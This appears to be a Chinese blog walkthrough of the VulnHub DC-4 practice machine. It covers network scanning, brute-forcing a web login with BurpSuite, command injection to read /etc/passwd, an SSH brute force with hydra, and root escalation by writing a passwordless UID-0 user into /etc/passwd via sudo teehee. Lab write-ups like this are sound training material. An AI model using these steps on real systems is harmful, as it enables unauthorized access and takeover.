靶机DC-4下载地址:https://download.vulnhub.com/dc/DC-4.zip
描述:从靶机DC-3开始,只有一个入口和一个最终的flag,只有拿到root权限才可以发现最终的flag,DC-4也是一样
环境:Vmware 15 Pro虚拟机软件
DC-4靶机IP地址:192.168.220.138
Kali的IP地址:192.168.220.131
DC-4靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.131
ip addr
使用nmap工具扫描192.168.220.0/24网段发现存活主机,扫到DC-4靶机IP为:192.168.220.138
nmap -T4 -sP 192.168.220.0/24 -oN nmap220.sP
使用nmap工具对DC-4靶机扫描开放的端口,开放端口有22(ssh)、80(http)
nmap -T4 -A 192.168.220.138 -p- -oN nmap138.A
浏览器打开靶机网址,是一个登录页面
http://192.168.220.138
登录页面提示“admin information systems login”,应该是使用admin用户登录,但需要对admin用户密码爆破
使用本地127.0.0.1:8080代理,并打开BurpSuite开启监听
输入用户名:admin,密码:123456,提交
在BurpSuite获得登录信息报文,选择“send to Intruder”
先选择“Clear$”,再为密码出“Add$”
选择Payloads模块,导入密码字典,字典位置/usr/share/john/password.lst
在Options模块设置线程数,设置500,点击“Start attack”,开始爆破
爆破结束后,选择Length最大的,就是爆破的密码
用户名:admin 密码:happy
登录页面输入用户名和密码登录,是一个命令使用页面
使用BurpSuite抓取包,并“Send to Repeater”
更改输入的命令:radio=cat+/etc/passwd&submit=Run
点击Go,发现有三个普通用户:charles、jim、sam
查看charles用户家目录,没有发现有价值的内容
查看sam用户家目录,也没有发现有价值的内容
查看jim用户的家目录,发现一个test.sh脚本先略过,一个mbox文件,一个backus目录
进入backups目录,发现一个old-passwords.bak备份文件,打开查看发现一堆备份的密码,将密码保存
使用hydra对三个普通用户ssh登录爆破,三个用户名写入user.dic文件,密码写入pass.txt文件,爆破成功发现jim登录密码
hydra -L users.dic -P old-passwords.bak 192.168.220.138 ssh -t 20 -o pass.txt
login: jim password: jibril04
使用jim用户成功连接到ssh
ssh jim@192.168.220.138
进入jim家目录,查看mbox文件,是发给jim的一封邮件的简单描述
cat mbox
进入/var/mail目录,查看邮件,发现charles用户的登录密码
用户名:charles 密码:^xHhA&hvim0y
切换到charles用户
su charles
^xHhA&hvim0y #密码
使用sudo命令查看charles用户可以哪些具有root权限的命令,发现可以使用teehee命令
sudo -l
teehee命令可以写入文件内容并不覆盖文件原有内容
使用teehee命令将一个无密码用户admin写入到/etc/passwd文件,并加入到root组中
echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
切换到admin用户登录,进入到/root目录下,找到flag.txt文件
su admin
id
cd /root
cat flag.txt
1934
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
